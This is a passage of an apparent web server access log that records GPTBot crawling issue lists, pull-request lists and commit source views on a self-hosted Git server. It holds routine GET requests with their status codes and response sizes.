(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +[17/Feb/2026:18:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22702] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:18:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:18:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15833] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:18:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14509] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:18:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11928] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:18:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:18:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12770] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13539] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12808] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15325] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12807] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13503] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13537] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:18:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12758] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:18:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17642] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:18:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 